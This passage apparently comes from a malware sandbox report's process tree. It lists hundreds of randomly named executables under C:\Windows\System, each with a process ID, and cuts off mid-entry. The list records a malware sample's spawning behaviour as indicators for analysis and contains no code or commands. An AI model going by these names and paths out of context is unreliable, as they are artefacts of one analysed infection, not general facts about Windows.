- C:\Windows\System\RWaArRM.exe
  C:\Windows\System\RWaArRM.exe
  2⤵
  PID:7292
- C:\Windows\System\SmmgkhR.exe
  C:\Windows\System\SmmgkhR.exe
  2⤵
  PID:7336
- C:\Windows\System\DVzWcmw.exe
  C:\Windows\System\DVzWcmw.exe
  2⤵
  PID:7400
- C:\Windows\System\PfMThoJ.exe
  C:\Windows\System\PfMThoJ.exe
  2⤵
  PID:7436
- C:\Windows\System\OWANZaj.exe
  C:\Windows\System\OWANZaj.exe
  2⤵
  PID:7492
- C:\Windows\System\NySQvIE.exe
  C:\Windows\System\NySQvIE.exe
  2⤵
  PID:7540
- C:\Windows\System\ufpeQas.exe
  C:\Windows\System\ufpeQas.exe
  2⤵
  PID:7568
- C:\Windows\System\XjIqSRd.exe
  C:\Windows\System\XjIqSRd.exe
  2⤵
  PID:5664
- C:\Windows\System\hrKwamd.exe
  C:\Windows\System\hrKwamd.exe
  2⤵
  PID:7652
- C:\Windows\System\ZVYBfUz.exe
  C:\Windows\System\ZVYBfUz.exe
  2⤵
  PID:5992
- C:\Windows\System\amvleyH.exe
  C:\Windows\System\amvleyH.exe
  2⤵
  PID:7792
- C:\Windows\System\YQcyCIT.exe
  C:\Windows\System\YQcyCIT.exe
  2⤵
  PID:7836
- C:\Windows\System\omrOhIy.exe
  C:\Windows\System\omrOhIy.exe
  2⤵
  PID:7920
- C:\Windows\System\XujkOUq.exe
  C:\Windows\System\XujkOUq.exe
  2⤵
  PID:7996
- C:\Windows\System\NWgOnOF.exe
  C:\Windows\System\NWgOnOF.exe
  2⤵
  PID:8044
- C:\Windows\System\qKxTSZI.exe
  C:\Windows\System\qKxTSZI.exe
  2⤵
  PID:8108
- C:\Windows\System\IVlKBar.exe
  C:\Windows\System\IVlKBar.exe
  2⤵
  PID:8172
- C:\Windows\System\ZtMWFOw.exe
  C:\Windows\System\ZtMWFOw.exe
  2⤵
  PID:5812
- C:\Windows\System\SZTwYxn.exe
  C:\Windows\System\SZTwYxn.exe
  2⤵
  PID:7352
- C:\Windows\System\coPFvoW.exe
  C:\Windows\System\coPFvoW.exe
  2⤵
  PID:7528
- C:\Windows\System\VHGospK.exe
  C:\Windows\System\VHGospK.exe
  2⤵
  PID:7740
- C:\Windows\System\QrNKiDl.exe
  C:\Windows\System\QrNKiDl.exe
  2⤵
  PID:7904
- C:\Windows\System\kCcrLIM.exe
  C:\Windows\System\kCcrLIM.exe
  2⤵
  PID:7964
- C:\Windows\System\RoEHOwo.exe
  C:\Windows\System\RoEHOwo.exe
  2⤵
  PID:8152
- C:\Windows\System\upnSwPL.exe
  C:\Windows\System\upnSwPL.exe
  2⤵
  PID:7380
- C:\Windows\System\hrevLRY.exe
  C:\Windows\System\hrevLRY.exe
  2⤵
  PID:7848
- C:\Windows\System\jrGVAcI.exe
  C:\Windows\System\jrGVAcI.exe
  2⤵
  PID:6040
- C:\Windows\System\iEmksRx.exe
  C:\Windows\System\iEmksRx.exe
  2⤵
  PID:8304
- C:\Windows\System\UvBeoxX.exe
  C:\Windows\System\UvBeoxX.exe
  2⤵
  PID:8320
- C:\Windows\System\iLPqgzu.exe
  C:\Windows\System\iLPqgzu.exe
  2⤵
  PID:8336
- C:\Windows\System\CymxIip.exe
  C:\Windows\System\CymxIip.exe
  2⤵
  PID:8352
- C:\Windows\System\MXzUGdA.exe
  C:\Windows\System\MXzUGdA.exe
  2⤵
  PID:8368
- C:\Windows\System\plBdDoP.exe
  C:\Windows\System\plBdDoP.exe
  2⤵
  PID:8388
- C:\Windows\System\PfmKJaY.exe
  C:\Windows\System\PfmKJaY.exe
  2⤵
  PID:8404
- C:\Windows\System\DKmypcg.exe
  C:\Windows\System\DKmypcg.exe
  2⤵
  PID:8420
- C:\Windows\System\yONPyJY.exe
  C:\Windows\System\yONPyJY.exe
  2⤵
  PID:8436
- C:\Windows\System\zlZmrDD.exe
  C:\Windows\System\zlZmrDD.exe
  2⤵
  PID:8452
- C:\Windows\System\fbfxTwZ.exe
  C:\Windows\System\fbfxTwZ.exe
  2⤵
  PID:8468
- C:\Windows\System\xIiZVBd.exe
  C:\Windows\System\xIiZVBd.exe
  2⤵
  PID:8484
- C:\Windows\System\wXsqjsE.exe
  C:\Windows\System\wXsqjsE.exe
  2⤵
  PID:8500
- C:\Windows\System\RiRBWLt.exe
  C:\Windows\System\RiRBWLt.exe
  2⤵
  PID:8516
- C:\Windows\System\epdeCHu.exe
  C:\Windows\System\epdeCHu.exe
  2⤵
  PID:8532
- C:\Windows\System\nFIQFor.exe
  C:\Windows\System\nFIQFor.exe
  2⤵
  PID:8548
- C:\Windows\System\OKKqCyR.exe
  C:\Windows\System\OKKqCyR.exe
  2⤵
  PID:8564
- C:\Windows\System\XYbTHQt.exe
  C:\Windows\System\XYbTHQt.exe
  2⤵
  PID:8580
- C:\Windows\System\swTKvLA.exe
  C:\Windows\System\swTKvLA.exe
  2⤵
  PID:8596
- C:\Windows\System\NnPGjYm.exe
  C:\Windows\System\NnPGjYm.exe
  2⤵
  PID:8612
- C:\Windows\System\iCjWnhA.exe
  C:\Windows\System\iCjWnhA.exe
  2⤵
  PID:8632
- C:\Windows\System\WLfbMQp.exe
  C:\Windows\System\WLfbMQp.exe
  2⤵
  PID:8664
- C:\Windows\System\MOivZqo.exe
  C:\Windows\System\MOivZqo.exe
  2⤵
  PID:8680
- C:\Windows\System\TMVmfdl.exe
  C:\Windows\System\TMVmfdl.exe
  2⤵
  PID:8760
- C:\Windows\System\AgfXuuL.exe
  C:\Windows\System\AgfXuuL.exe
  2⤵
  PID:8788
- C:\Windows\System\FUdWZwc.exe
  C:\Windows\System\FUdWZwc.exe
  2⤵
  PID:8816
- C:\Windows\System\BbMTHRL.exe
  C:\Windows\System\BbMTHRL.exe
  2⤵
  PID:8836
- C:\Windows\System\NKiUqNd.exe
  C:\Windows\System\NKiUqNd.exe
  2⤵
  PID:8956
- C:\Windows\System\zuJtsyO.exe
  C:\Windows\System\zuJtsyO.exe
  2⤵
  PID:9080
- C:\Windows\System\mqjixWg.exe
  C:\Windows\System\mqjixWg.exe
  2⤵
  PID:9108
- C:\Windows\System\LdlyOSI.exe
  C:\Windows\System\LdlyOSI.exe
  2⤵
  PID:9132
- C:\Windows\System\JSfRJuD.exe
  C:\Windows\System\JSfRJuD.exe
  2⤵
  PID:9152
- C:\Windows\System\QTmLTVR.exe
  C:\Windows\System\QTmLTVR.exe
  2⤵
  PID:9176
- C:\Windows\System\AJbfdpH.exe
  C:\Windows\System\AJbfdpH.exe
  2⤵
  PID:8316
- C:\Windows\System\ZwrsUqH.exe
  C:\Windows\System\ZwrsUqH.exe
  2⤵
  PID:8360
- C:\Windows\System\ZmfksQV.exe
  C:\Windows\System\ZmfksQV.exe
  2⤵
  PID:8592
- C:\Windows\System\aRDiPHl.exe
  C:\Windows\System\aRDiPHl.exe
  2⤵
  PID:8644
- C:\Windows\System\rcXpUcA.exe
  C:\Windows\System\rcXpUcA.exe
  2⤵
  PID:8212
- C:\Windows\System\xMPbuyK.exe
  C:\Windows\System\xMPbuyK.exe
  2⤵
  PID:8276
- C:\Windows\System\JsXxjrJ.exe
  C:\Windows\System\JsXxjrJ.exe
  2⤵
  PID:8256
- C:\Windows\System\CxrRLyw.exe
  C:\Windows\System\CxrRLyw.exe
  2⤵
  PID:8716
- C:\Windows\System\XHVZiMq.exe
  C:\Windows\System\XHVZiMq.exe
  2⤵
  PID:8384
- C:\Windows\System\IBMSiqM.exe
  C:\Windows\System\IBMSiqM.exe
  2⤵
  PID:8448
- C:\Windows\System\fcZWaaK.exe
  C:\Windows\System\fcZWaaK.exe
  2⤵
  PID:8492
- C:\Windows\System\VOlBhDN.exe
  C:\Windows\System\VOlBhDN.exe
  2⤵
  PID:8528
- C:\Windows\System\bMKsrsi.exe
  C:\Windows\System\bMKsrsi.exe
  2⤵
  PID:8804
- C:\Windows\System\HdvnhXh.exe
  C:\Windows\System\HdvnhXh.exe
  2⤵
  PID:8852
- C:\Windows\System\ztpklkG.exe
  C:\Windows\System\ztpklkG.exe
  2⤵
  PID:8936
- C:\Windows\System\gqlXeSW.exe
  C:\Windows\System\gqlXeSW.exe
  2⤵
  PID:8768
- C:\Windows\System\EVNNqGp.exe
  C:\Windows\System\EVNNqGp.exe
  2⤵
  PID:8952
- C:\Windows\System\ytolrWi.exe
  C:\Windows\System\ytolrWi.exe
  2⤵
  PID:9168
- C:\Windows\System\IrYYXua.exe
  C:\Windows\System\IrYYXua.exe
  2⤵
  PID:8292
- C:\Windows\System\YVwUmIF.exe
  C:\Windows\System\YVwUmIF.exe
  2⤵
  PID:8652
- C:\Windows\System\gTDCyRy.exe
  C:\Windows\System\gTDCyRy.exe
  2⤵
  PID:8204
- C:\Windows\System\YFvNOst.exe
  C:\Windows\System\YFvNOst.exe
  2⤵
  PID:8260
- C:\Windows\System\oVnDtbK.exe
  C:\Windows\System\oVnDtbK.exe
  2⤵
  PID:8672
- C:\Windows\System\spDRbpT.exe
  C:\Windows\System\spDRbpT.exe
  2⤵
  PID:8844
- C:\Windows\System\lPuFOVG.exe
  C:\Windows\System\lPuFOVG.exe
  2⤵
  PID:8800
- C:\Windows\System\rJoWkXQ.exe
  C:\Windows\System\rJoWkXQ.exe
  2⤵
  PID:8948
- C:\Windows\System\NSApfft.exe
  C:\Windows\System\NSApfft.exe
  2⤵
  PID:2596
- C:\Windows\System\jNMwmhd.exe
  C:\Windows\System\jNMwmhd.exe
  2⤵
  PID:8640
- C:\Windows\System\oBLnMos.exe
  C:\Windows\System\oBLnMos.exe
  2⤵
  PID:8268
- C:\Windows\System\piXemfP.exe
  C:\Windows\System\piXemfP.exe
  2⤵
  PID:8068
- C:\Windows\System\EwNFGAS.exe
  C:\Windows\System\EwNFGAS.exe
  2⤵
  PID:8476
- C:\Windows\System\GyeOqZi.exe
  C:\Windows\System\GyeOqZi.exe
  2⤵
  PID:8280
- C:\Windows\System\IrIeUpt.exe
  C:\Windows\System\IrIeUpt.exe
  2⤵
  PID:9252
- C:\Windows\System\mKOKQRN.exe
  C:\Windows\System\mKOKQRN.exe
  2⤵
  PID:9272
- C:\Windows\System\RPmzXLp.exe
  C:\Windows\System\RPmzXLp.exe
  2⤵
  PID:9292
- C:\Windows\System\dkAjPGO.exe
  C:\Windows\System\dkAjPGO.exe
  2⤵
  PID:9312
- C:\Windows\System\gwTxWFB.exe
  C:\Windows\System\gwTxWFB.exe
  2⤵
  PID:9332
- C:\Windows\System\iFMWUEb.exe
  C:\Windows\System\iFMWUEb.exe
  2⤵
  PID:9372
- C:\Windows\System\GqHUifw.exe
  C:\Windows\System\GqHUifw.exe
  2⤵
  PID:9404
- C:\Windows\System\HvzKkTP.exe
  C:\Windows\System\HvzKkTP.exe
  2⤵
  PID:9420
- C:\Windows\System\uZtXXwW.exe
  C:\Windows\System\uZtXXwW.exe
  2⤵
  PID:9440
- C:\Windows\System\kxoUmRR.exe
  C:\Windows\System\kxoUmRR.exe
  2⤵
  PID:9484
- C:\Windows\System\fFLggqN.exe
  C:\Windows\System\fFLggqN.exe
  2⤵
  PID:9508
- C:\Windows\System\nRibXCl.exe
  C:\Windows\System\nRibXCl.exe
  2⤵
  PID:9528
- C:\Windows\System\KekxwBw.exe
  C:\Windows\System\KekxwBw.exe
  2⤵
  PID:9556
- C:\Windows\System\CbuQPhv.exe
  C:\Windows\System\CbuQPhv.exe
  2⤵
  PID:9596
- C:\Windows\System\LPOJHhb.exe
  C:\Windows\System\LPOJHhb.exe
  2⤵
  PID:9632
- C:\Windows\System\DAYWNZL.exe
  C:\Windows\System\DAYWNZL.exe
  2⤵
  PID:9652
- C:\Windows\System\enyRtfF.exe
  C:\Windows\System\enyRtfF.exe
  2⤵
  PID:9676
- C:\Windows\System\sZKqVHy.exe
  C:\Windows\System\sZKqVHy.exe
  2⤵
  PID:9708
- C:\Windows\System\KyRxCwj.exe
  C:\Windows\System\KyRxCwj.exe
  2⤵
  PID:9736
- C:\Windows\System\KbIESiA.exe
  C:\Windows\System\KbIESiA.exe
  2⤵
  PID:9764
- C:\Windows\System\XZrqTBf.exe
  C:\Windows\System\XZrqTBf.exe
  2⤵
  PID:9788
- C:\Windows\System\HRpYPZG.exe
  C:\Windows\System\HRpYPZG.exe
  2⤵
  PID:9828
- C:\Windows\System\OdhJWBj.exe
  C:\Windows\System\OdhJWBj.exe
  2⤵
  PID:9852
- C:\Windows\System\DTaceHa.exe
  C:\Windows\System\DTaceHa.exe
  2⤵
  PID:9892
- C:\Windows\System\KKcRyns.exe
  C:\Windows\System\KKcRyns.exe
  2⤵
  PID:9908
- C:\Windows\System\ffdAZuS.exe
  C:\Windows\System\ffdAZuS.exe
  2⤵
  PID:9932
- C:\Windows\System\ViuiKqj.exe
  C:\Windows\System\ViuiKqj.exe
  2⤵
  PID:9960
- C:\Windows\System\NLywFEl.exe
  C:\Windows\System\NLywFEl.exe
  2⤵
  PID:10000
- C:\Windows\System\KFDBNrq.exe
  C:\Windows\System\KFDBNrq.exe
  2⤵
  PID:10028
- C:\Windows\System\plJxELa.exe
  C:\Windows\System\plJxELa.exe
  2⤵
  PID:10052
- C:\Windows\System\JGBHneu.exe
  C:\Windows\System\JGBHneu.exe
  2⤵
  PID:10072
- C:\Windows\System\ZyMYPGd.exe
  C:\Windows\System\ZyMYPGd.exe
  2⤵
  PID:10100
- C:\Windows\System\URiBGyT.exe
  C:\Windows\System\URiBGyT.exe
  2⤵
  PID:10124
- C:\Windows\System\iskYmxF.exe
  C:\Windows\System\iskYmxF.exe
  2⤵
  PID:10148
- C:\Windows\System\CpWOBMt.exe
  C:\Windows\System\CpWOBMt.exe
  2⤵
  PID:10180
- C:\Windows\System\gsvpOPi.exe
  C:\Windows\System\gsvpOPi.exe
  2⤵
  PID:10200
- C:\Windows\System\sEGhxms.exe
  C:\Windows\System\sEGhxms.exe
  2⤵
  PID:8432
- C:\Windows\System\DSlRyFm.exe
  C:\Windows\System\DSlRyFm.exe
  2⤵
  PID:9244
- C:\Windows\System\qAtniDb.exe
  C:\Windows\System\qAtniDb.exe
  2⤵
  PID:9280
- C:\Windows\System\XEhKZgP.exe
  C:\Windows\System\XEhKZgP.exe
  2⤵
  PID:9324
- C:\Windows\System\VREjKPE.exe
  C:\Windows\System\VREjKPE.exe
  2⤵
  PID:9388
- C:\Windows\System\ATwDRnJ.exe
  C:\Windows\System\ATwDRnJ.exe
  2⤵
  PID:9416
- C:\Windows\System\xczgqcM.exe
  C:\Windows\System\xczgqcM.exe
  2⤵
  PID:9576
- C:\Windows\System\gcvhaqD.exe
  C:\Windows\System\gcvhaqD.exe
  2⤵
  PID:9660
- C:\Windows\System\GfoistZ.exe
  C:\Windows\System\GfoistZ.exe
  2⤵
  PID:9700
- C:\Windows\System\ViveVkq.exe
  C:\Windows\System\ViveVkq.exe
  2⤵
  PID:9744
- C:\Windows\System\qaCGoJi.exe
  C:\Windows\System\qaCGoJi.exe
  2⤵
  PID:9812
- C:\Windows\System\WBIfeDD.exe
  C:\Windows\System\WBIfeDD.exe
  2⤵
  PID:9864
- C:\Windows\System\rMMtlnD.exe
  C:\Windows\System\rMMtlnD.exe
  2⤵
  PID:9924
- C:\Windows\System\CPdxfTS.exe
  C:\Windows\System\CPdxfTS.exe
  2⤵
  PID:10012
- C:\Windows\System\HgJoKhW.exe
  C:\Windows\System\HgJoKhW.exe
  2⤵
  PID:10120
- C:\Windows\System\HsQCYsA.exe
  C:\Windows\System\HsQCYsA.exe
  2⤵
  PID:10192
- C:\Windows\System\qmQgnHD.exe
  C:\Windows\System\qmQgnHD.exe
  2⤵
  PID:10236
- C:\Windows\System\oIPoVgR.exe
  C:\Windows\System\oIPoVgR.exe
  2⤵
  PID:9344
- C:\Windows\System\knRRaGD.exe
  C:\Windows\System\knRRaGD.exe
  2⤵
  PID:9436
- C:\Windows\System\BvtQwqy.exe
  C:\Windows\System\BvtQwqy.exe
  2⤵
  PID:9564
- C:\Windows\System\kWfgGSZ.exe
  C:\Windows\System\kWfgGSZ.exe
  2⤵
  PID:9720
- C:\Windows\System\oZhMWww.exe
  C:\Windows\System\oZhMWww.exe
  2⤵
  PID:9904
- C:\Windows\System\CudVYJA.exe
  C:\Windows\System\CudVYJA.exe
  2⤵
  PID:10116
- C:\Windows\System\ZCGCtwp.exe
  C:\Windows\System\ZCGCtwp.exe
  2⤵
  PID:10172
- C:\Windows\System\sGGzwwm.exe
  C:\Windows\System\sGGzwwm.exe
  2⤵
  PID:9780
- C:\Windows\System\VoaCjCQ.exe
  C:\Windows\System\VoaCjCQ.exe
  2⤵
  PID:9844
- C:\Windows\System\cvvIogV.exe
  C:\Windows\System\cvvIogV.exe
  2⤵
  PID:9232
- C:\Windows\System\sbJnVQN.exe
  C:\Windows\System\sbJnVQN.exe
  2⤵
  PID:9992
- C:\Windows\System\lPpuPfD.exe
  C:\Windows\System\lPpuPfD.exe
  2⤵
  PID:10264
- C:\Windows\System\YHtldeO.exe
  C:\Windows\System\YHtldeO.exe
  2⤵
  PID:10292
- C:\Windows\System\UMDFAKI.exe
  C:\Windows\System\UMDFAKI.exe
  2⤵
  PID:10320
- C:\Windows\System\NZHWxhC.exe
  C:\Windows\System\NZHWxhC.exe
  2⤵
  PID:10348
- C:\Windows\System\GNsshBI.exe
  C:\Windows\System\GNsshBI.exe
  2⤵
  PID:10372
- C:\Windows\System\VjvwpXo.exe
  C:\Windows\System\VjvwpXo.exe
  2⤵
  PID:10392
- C:\Windows\System\QDHlTlw.exe
  C:\Windows\System\QDHlTlw.exe
  2⤵
  PID:10420
- C:\Windows\System\DNdBZZr.exe
  C:\Windows\System\DNdBZZr.exe
  2⤵
  PID:10448
- C:\Windows\System\qwOIeFM.exe
  C:\Windows\System\qwOIeFM.exe
  2⤵
  PID:10472
- C:\Windows\System\HdYuhWm.exe
  C:\Windows\System\HdYuhWm.exe
  2⤵
  PID:10492
- C:\Windows\System\dilcpRg.exe
  C:\Windows\System\dilcpRg.exe
  2⤵
  PID:10516
- C:\Windows\System\ZzhRBjl.exe
  C:\Windows\System\ZzhRBjl.exe
  2⤵
  PID:10536
- C:\Windows\System\IAGNpKn.exe
  C:\Windows\System\IAGNpKn.exe
  2⤵
  PID:10576
- C:\Windows\System\KhNbnlk.exe
  C:\Windows\System\KhNbnlk.exe
  2⤵
  PID:10628
- C:\Windows\System\VLXUWyf.exe
  C:\Windows\System\VLXUWyf.exe
  2⤵
  PID:10652
- C:\Windows\System\rIVanQm.exe
  C:\Windows\System\rIVanQm.exe
  2⤵
  PID:10668
- C:\Windows\System\GGtjZJZ.exe
  C:\Windows\System\GGtjZJZ.exe
  2⤵
  PID:10688
- C:\Windows\System\lfZWwyF.exe
  C:\Windows\System\lfZWwyF.exe
  2⤵
  PID:10720
- C:\Windows\System\fdsgvtf.exe
  C:\Windows\System\fdsgvtf.exe
  2⤵
  PID:10744
- C:\Windows\System\DwLDvxD.exe
  C:\Windows\System\DwLDvxD.exe
  2⤵
  PID:10776
- C:\Windows\System\ieWDOBa.exe
  C:\Windows\System\ieWDOBa.exe
  2⤵
  PID:10824
- C:\Windows\System\zgeNUyU.exe
  C:\Windows\System\zgeNUyU.exe
  2⤵
  PID:10856
- C:\Windows\System\vEVjyBC.exe
  C:\Windows\System\vEVjyBC.exe
  2⤵
  PID:10876
- C:\Windows\System\bQAUHDN.exe
  C:\Windows\System\bQAUHDN.exe
  2⤵
  PID:10908
- C:\Windows\System\DPfLRbS.exe
  C:\Windows\System\DPfLRbS.exe
  2⤵
  PID:10932
- C:\Windows\System\LmOzXNT.exe
  C:\Windows\System\LmOzXNT.exe
  2⤵
  PID:10952
- C:\Windows\System\WSEnIMA.exe
  C:\Windows\System\WSEnIMA.exe
  2⤵
  PID:10984
- C:\Windows\System\KEkFtnK.exe
  C:\Windows\System\KEkFtnK.exe
  2⤵
  PID:11020
- C:\Windows\System\apimGDk.exe
  C:\Windows\System\apimGDk.exe
  2⤵
  PID:11060
- C:\Windows\System\DtGhUNg.exe
  C:\Windows\System\DtGhUNg.exe
  2⤵
  PID:11088
- C:\Windows\System\IAnMlKq.exe
  C:\Windows\System\IAnMlKq.exe
  2⤵
  PID:11112
- C:\Windows\System\kktUPvO.exe
  C:\Windows\System\kktUPvO.exe
  2⤵
  PID:11132
- C:\Windows\System\VcrDyYe.exe
  C:\Windows\System\VcrDyYe.exe
  2⤵
  PID:11172
- C:\Windows\System\pWsKpkk.exe
  C:\Windows\System\pWsKpkk.exe
  2⤵
  PID:11192
- C:\Windows\System\TwxwFRn.exe
  C:\Windows\System\TwxwFRn.exe
  2⤵
  PID:11216
- C:\Windows\System\nXAsMMa.exe
  C:\Windows\System\nXAsMMa.exe
  2⤵
  PID:11244
- C:\Windows\System\fOoDSsF.exe
  C:\Windows\System\fOoDSsF.exe
  2⤵
  PID:9880
- C:\Windows\System\SUBJYGh.exe
  C:\Windows\System\SUBJYGh.exe
  2⤵
  PID:10300
- C:\Windows\System\IKHjBHD.exe
  C:\Windows\System\IKHjBHD.exe
  2⤵
  PID:10312
- C:\Windows\System\aluSyZA.exe
  C:\Windows\System\aluSyZA.exe
  2⤵
  PID:10364
- C:\Windows\System\emwdDUK.exe
  C:\Windows\System\emwdDUK.exe
  2⤵
  PID:10468
- C:\Windows\System\WJkakcr.exe
  C:\Windows\System\WJkakcr.exe
  2⤵
  PID:10596
- C:\Windows\System\iRNhcQR.exe
  C:\Windows\System\iRNhcQR.exe
  2⤵
  PID:10660
- C:\Windows\System\DiDdiXh.exe
  C:\Windows\System\DiDdiXh.exe
  2⤵
  PID:10664
- C:\Windows\System\IYaCSex.exe
  C:\Windows\System\IYaCSex.exe
  2⤵
  PID:10712
- C:\Windows\System\sFQNQTy.exe
  C:\Windows\System\sFQNQTy.exe
  2⤵
  PID:10788
- C:\Windows\System\DJjOLFv.exe
  C:\Windows\System\DJjOLFv.exe
  2⤵
  PID:10888
- C:\Windows\System\ztLKTgY.exe
  C:\Windows\System\ztLKTgY.exe
  2⤵
  PID:10992
- C:\Windows\System\DihSGNA.exe
  C:\Windows\System\DihSGNA.exe
  2⤵
  PID:11040
- C:\Windows\System\tBFIkkX.exe
  C:\Windows\System\tBFIkkX.exe
  2⤵
  PID:11084
- C:\Windows\System\qQXfGBh.exe
  C:\Windows\System\qQXfGBh.exe
  2⤵
  PID:11168
- C:\Windows\System\eHNZciD.exe
  C:\Windows\System\eHNZciD.exe
  2⤵
  PID:11224
- C:\Windows\System\bLwMQBJ.exe
  C:\Windows\System\bLwMQBJ.exe
  2⤵
  PID:9848
- C:\Windows\System\wObYHqI.exe
  C:\Windows\System\wObYHqI.exe
  2⤵
  PID:10316
- C:\Windows\System\qGvigAd.exe
  C:\Windows\System\qGvigAd.exe
  2⤵
  PID:10636
- C:\Windows\System\JKDhwSq.exe
  C:\Windows\System\JKDhwSq.exe
  2⤵
  PID:10812
- C:\Windows\System\HFhPEir.exe
  C:\Windows\System\HFhPEir.exe
  2⤵
  PID:10928
- C:\Windows\System\fSqNAHu.exe
  C:\Windows\System\fSqNAHu.exe
  2⤵
  PID:11032
- C:\Windows\System\CtrhTQL.exe
  C:\Windows\System\CtrhTQL.exe
  2⤵
  PID:11072
- C:\Windows\System\WLIwWEN.exe
  C:\Windows\System\WLIwWEN.exe
  2⤵
  PID:11188
- C:\Windows\System\iVdVJIB.exe
  C:\Windows\System\iVdVJIB.exe
  2⤵
  PID:10388
- C:\Windows\System\Zelfmod.exe
  C:\Windows\System\Zelfmod.exe
  2⤵
  PID:10948
- C:\Windows\System\dMoOeYC.exe
  C:\Windows\System\dMoOeYC.exe
  2⤵
  PID:10400
- C:\Windows\System\ENoynXN.exe
  C:\Windows\System\ENoynXN.exe
  2⤵
  PID:10784
- C:\Windows\System\VSaPbmU.exe
  C:\Windows\System\VSaPbmU.exe
  2⤵
  PID:11284
- C:\Windows\System\cNDiRbM.exe
  C:\Windows\System\cNDiRbM.exe
  2⤵
  PID:11364
- C:\Windows\System\rlJgTqG.exe
  C:\Windows\System\rlJgTqG.exe
  2⤵
  PID:11380
- C:\Windows\System\KJKWKZu.exe
  C:\Windows\System\KJKWKZu.exe
  2⤵
  PID:11396
- C:\Windows\System\avwtQtI.exe
  C:\Windows\System\avwtQtI.exe
  2⤵
  PID:11416
- C:\Windows\System\oULJEcB.exe
  C:\Windows\System\oULJEcB.exe
  2⤵
  PID:11444
- C:\Windows\System\rlysUfW.exe
  C:\Windows\System\rlysUfW.exe
  2⤵
  PID:11484
- C:\Windows\System\qttanaB.exe
  C:\Windows\System\qttanaB.exe
  2⤵
  PID:11500
- C:\Windows\System\tXtveBx.exe
  C:\Windows\System\tXtveBx.exe
  2⤵
  PID:11548
- C:\Windows\System\BbMqNXB.exe
  C:\Windows\System\BbMqNXB.exe
  2⤵
  PID:11568
- C:\Windows\System\uCAcYVq.exe
  C:\Windows\System\uCAcYVq.exe
  2⤵
  PID:11592
- C:\Windows\System\owxcRsI.exe
  C:\Windows\System\owxcRsI.exe
  2⤵
  PID:11620
- C:\Windows\System\FLrnybr.exe
  C:\Windows\System\FLrnybr.exe
  2⤵
  PID:11652
- C:\Windows\System\ubsrsbj.exe
  C:\Windows\System\ubsrsbj.exe
  2⤵
  PID:11672
- C:\Windows\System\BELpNTh.exe
  C:\Windows\System\BELpNTh.exe
  2⤵
  PID:11688
- C:\Windows\System\IRdcGXy.exe
  C:\Windows\System\IRdcGXy.exe
  2⤵
  PID:11720
- C:\Windows\System\qoGWnMg.exe
  C:\Windows\System\qoGWnMg.exe
  2⤵
  PID:11744
- C:\Windows\System\BvKIONp.exe
  C:\Windows\System\BvKIONp.exe
  2⤵
  PID:11772
- C:\Windows\System\ojRgvkG.exe
  C:\Windows\System\ojRgvkG.exe
  2⤵
  PID:11804
- C:\Windows\System\LQPuWGB.exe
  C:\Windows\System\LQPuWGB.exe
  2⤵
  PID:11828
- C:\Windows\System\bAvzSJX.exe
  C:\Windows\System\bAvzSJX.exe
  2⤵
  PID:11872
- C:\Windows\System\LWDrvhQ.exe
  C:\Windows\System\LWDrvhQ.exe
  2⤵
  PID:11900
- C:\Windows\System\ygZfBtS.exe
  C:\Windows\System\ygZfBtS.exe
  2⤵
  PID:11920
- C:\Windows\System\qauzMHp.exe
  C:\Windows\System\qauzMHp.exe
  2⤵
  PID:11944
- C:\Windows\System\JMkPjhM.exe
  C:\Windows\System\JMkPjhM.exe
  2⤵
  PID:11964
- C:\Windows\System\xqXFFZh.exe
  C:\Windows\System\xqXFFZh.exe
  2⤵
  PID:12024
- C:\Windows\System\LVqqJIU.exe
  C:\Windows\System\LVqqJIU.exe
  2⤵
  PID:12044
- C:\Windows\System\tozlvwz.exe
  C:\Windows\System\tozlvwz.exe
  2⤵
  PID:12068
- C:\Windows\System\XrwZSLM.exe
  C:\Windows\System\XrwZSLM.exe
  2⤵
  PID:12112
- C:\Windows\System\CdYeihg.exe
  C:\Windows\System\CdYeihg.exe
  2⤵
  PID:12132
- C:\Windows\System\loQrzeX.exe
  C:\Windows\System\loQrzeX.exe
  2⤵
  PID:12176
- C:\Windows\System\KqFXQcR.exe
  C:\Windows\System\KqFXQcR.exe
  2⤵
  PID:12200
- C:\Windows\System\CgxOzll.exe
  C:\Windows\System\CgxOzll.exe
  2⤵
  PID:12220
- C:\Windows\System\GlMyTfE.exe
  C:\Windows\System\GlMyTfE.exe
  2⤵
  PID:12236
- C:\Windows\System\YiuzDxJ.exe
  C:\Windows\System\YiuzDxJ.exe
  2⤵
  PID:12268
- C:\Windows\System\iFyBUnR.exe
  C:\Windows\System\iFyBUnR.exe
  2⤵
  PID:11184
- C:\Windows\System\bJGYric.exe
  C:\Windows\System\bJGYric.exe
  2⤵
  PID:11316
- C:\Windows\System\VZilEEE.exe
  C:\Windows\System\VZilEEE.exe
  2⤵
  PID:11392
- C:\Windows\System\JxcGkvr.exe
  C:\Windows\System\JxcGkvr.exe
  2⤵
  PID:11436
- C:\Windows\System\nUaUwKC.exe
  C:\Windows\System\nUaUwKC.exe
  2⤵
  PID:11472
- C:\Windows\System\svxzPGS.exe
  C:\Windows\System\svxzPGS.exe
  2⤵
  PID:11560
- C:\Windows\System\fWTMXMu.exe
  C:\Windows\System\fWTMXMu.exe
  2⤵
  PID:11664
- C:\Windows\System\khJQIxN.exe
  C:\Windows\System\khJQIxN.exe
  2⤵
  PID:11660
- C:\Windows\System\CLbKrmy.exe
  C:\Windows\System\CLbKrmy.exe
  2⤵
  PID:11764
- C:\Windows\System\ommSHXG.exe
  C:\Windows\System\ommSHXG.exe
  2⤵
  PID:11860
- C:\Windows\System\yJeptAJ.exe
  C:\Windows\System\yJeptAJ.exe
  2⤵
  PID:11932
- C:\Windows\System\uFilKSF.exe
  C:\Windows\System\uFilKSF.exe
  2⤵
  PID:11984
- C:\Windows\System\mUYbvRn.exe
  C:\Windows\System\mUYbvRn.exe
  2⤵
  PID:12052
- C:\Windows\System\fsmsBtg.exe
  C:\Windows\System\fsmsBtg.exe
  2⤵
  PID:12124
- C:\Windows\System\heIBwBS.exe
  C:\Windows\System\heIBwBS.exe
  2⤵
  PID:12168
- C:\Windows\System\tMSflrY.exe
  C:\Windows\System\tMSflrY.exe
  2⤵
  PID:12216
- C:\Windows\System\MxPEeuR.exe
  C:\Windows\System\MxPEeuR.exe
  2⤵
  PID:376
- C:\Windows\System\VCTciXU.exe
  C:\Windows\System\VCTciXU.exe
  2⤵
  PID:12276
- C:\Windows\System\gQKgPOG.exe
  C:\Windows\System\gQKgPOG.exe
  2⤵
  PID:11272
- C:\Windows\System\KnztxBT.exe
  C:\Windows\System\KnztxBT.exe
  2⤵
  PID:11496
- C:\Windows\System\fncBFWP.exe
  C:\Windows\System\fncBFWP.exe
  2⤵
